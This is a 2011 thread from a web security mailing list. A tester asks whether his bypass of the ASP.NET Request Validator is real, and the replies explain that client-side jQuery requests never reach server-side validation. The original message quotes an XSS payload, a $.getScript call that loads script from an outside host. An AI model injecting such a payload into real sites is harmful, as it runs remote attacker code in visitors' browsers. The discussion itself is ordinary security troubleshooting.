[WEB SECURITY] ASP.NET Request Validator Bypass?

Arian J. Evans arian.evans at anachronic.com
Sat Feb 19 16:52:08 EST 2011


Exactly. ASP.NET requestValidators are a server-side control.

jquery getScript is designed to be used client-side and fetch a script
to build or interface with the DOM. Therefore the server side controls
would never see it.

---
Arian Evans



On Sat, Feb 19, 2011 at 10:04 AM, steve jensen <sjensen1207 at hotmail.com> wrote:
> If this jQuery .getScript request is only performed client-side, then it
> wouldn't even be sent to the server-side ASP.NET XSS validation to be
> bypassed.
>
> ________________________________
> Date: Sat, 19 Feb 2011 15:39:06 +0000
> From: ryandewhurst at gmail.com
> To: websecurity at webappsec.org
> Subject: [WEB SECURITY] ASP.NET Request Validator Bypass?
>
> Hi,
>
> Recently on a client test I was able to bypass the ASP.NET Request Validator
> by leveraging the jQuery library which was included in the page. I am mainly
> a LAMP guy and my knowledge of ASP.NET and how to set it up is minimal.
>
> I was wondering if any one could confirm whether my bypass affects all
> ASP.NET installations or whether or not this particular client had it
> configured incorrectly.
>
> I used the following jQuery function to bypass the filter:
> $.getScript('//ha.ckers.org/.j');
>
> Thanks,
> Ryan
>
> Ryan Dewhurst
>
> blog www.ethicalhack3r.co.uk
> projects www.dvwa.co.uk | www.webwordcount.com
> twitter www.twitter.com/ethicalhack3r
>
> _______________________________________________ The Web Security Mailing
> List WebSecurity RSS Feed http://www.webappsec.org/rss/websecurity.rss Join
> WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA WASC on
> Twitter http://twitter.com/wascupdates websecurity at lists.webappsec.org
> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
> _______________________________________________
> The Web Security Mailing List
>
> WebSecurity RSS Feed
> http://www.webappsec.org/rss/websecurity.rss
>
> Join WASC on LinkedIn http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
> WASC on Twitter
> http://twitter.com/wascupdates
>
> websecurity at lists.webappsec.org
> http://lists.webappsec.org/mailman/listinfo/websecurity_lists.webappsec.org
>
>




More information about the websecurity mailing list